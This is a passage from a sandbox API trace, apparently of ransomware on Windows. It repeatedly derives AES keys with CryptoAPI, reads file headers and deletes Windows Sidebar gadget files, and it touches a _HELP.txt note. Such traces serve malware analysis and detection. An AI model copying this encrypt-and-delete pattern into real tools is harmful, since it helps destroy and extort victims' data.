(normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_s.png")) returned 0 [0187.826] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.827] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.827] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.827] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.827] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4d87 [0187.827] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.830] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.830] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.830] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.831] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_settings.png")) returned 0 [0187.831] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.832] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.832] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.832] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.832] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x519b [0187.832] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.848] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.848] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.848] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.849] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system.png")) returned 0 [0187.851] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.851] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.851] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.851] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.851] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf3 [0187.851] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.853] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.853] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.853] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.854] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_dot.png")) returned 0 [0187.854] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.855] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.855] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.855] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.855] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0187.855] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.856] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.857] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.857] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.858] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_h.png")) returned 0 [0187.859] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.859] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.859] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.859] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.859] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0187.859] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.861] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.861] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.861] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.863] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_m.png")) returned 0 [0187.863] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.864] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.864] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.864] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.864] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbbb [0187.864] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.866] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.866] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.866] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.867] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_s.png")) returned 0 [0187.868] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.869] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.869] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.869] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.869] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5a3d [0187.869] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.872] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.872] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.872] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.874] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_settings.png")) returned 0 [0187.886] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.886] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.886] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.886] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.886] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c3b [0187.886] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.890] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.890] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.890] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.891] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad.png")) returned 0 [0187.892] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.893] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.893] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.893] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.893] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbcb [0187.893] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.895] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.895] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.895] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.896] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_dot.png")) returned 0 [0187.897] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.897] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.897] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.897] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.897] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15f [0187.897] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.899] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.899] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.899] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.900] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_h.png")) returned 0 [0187.901] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.902] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.902] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.902] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.902] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x169 [0187.902] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.903] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.903] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.903] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.905] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_m.png")) returned 0 [0187.905] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.905] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.905] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.906] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.906] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbb8 [0187.906] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.908] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.908] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.908] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.909] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_s.png")) returned 0 [0187.910] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.911] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.911] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.911] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.911] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5385 [0187.911] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.914] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.914] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.914] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.916] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png")) returned 0 [0187.916] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.916] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.916] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.916] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.917] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0187.917] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.917] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.917] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.917] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.919] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\_HELP.txt" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\_help.txt")) returned 1 [0187.920] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0187.920] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0187.920] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.920] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0187.920] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0187.921] ReadFile (in: hFile=0x598, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0187.936] CryptDestroyHash (hHash=0x284d668) returned 1 [0187.936] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0187.936] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.937] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\logo.png")) returned 0 [0187.938] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0187.939] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0187.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0187.939] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0187.939] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4f1c [0187.940] ReadFile (in: hFile=0x584, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0187.943] CryptDestroyHash (hHash=0x284d568) returned 1 [0187.943] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0187.943] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.944] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\drag.png")) returned 0 [0187.945] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0187.946] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.946] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.946] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.946] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.946] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1216 [0187.947] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.949] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.949] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.949] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.951] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html")) returned 0 [0187.952] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0187.952] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0187.953] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0187.953] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.953] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0187.953] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x55c [0187.953] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0187.955] CryptDestroyHash (hHash=0x284d568) returned 1 [0187.955] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0187.955] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.956] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css")) returned 0 [0187.957] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.957] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.957] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.957] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0187.957] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3e1 [0187.957] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, 